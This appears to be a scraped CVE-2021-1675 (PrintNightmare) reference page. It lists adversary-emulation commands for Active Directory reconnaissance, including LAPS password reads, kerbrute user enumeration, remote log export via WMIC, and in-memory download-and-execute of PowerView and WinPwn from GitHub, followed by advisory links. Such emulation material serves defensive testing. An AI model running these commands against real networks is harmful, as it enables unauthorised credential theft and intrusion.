Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-1675 |
| portal.msrc.microsoft.com |
GitHub CVE
x_refsource_MISC
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1675 |
| kb.cert.org |
GitHub CVE
third-party-advisory
x_refsource_CERT-VN
|
https://www.kb.cert.org/vuls/id/383432 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163349/Microsoft-PrintNightmare-Proof-Of-Concept.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163351/PrintNightmare-Windows-Spooler-Service-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-1675 |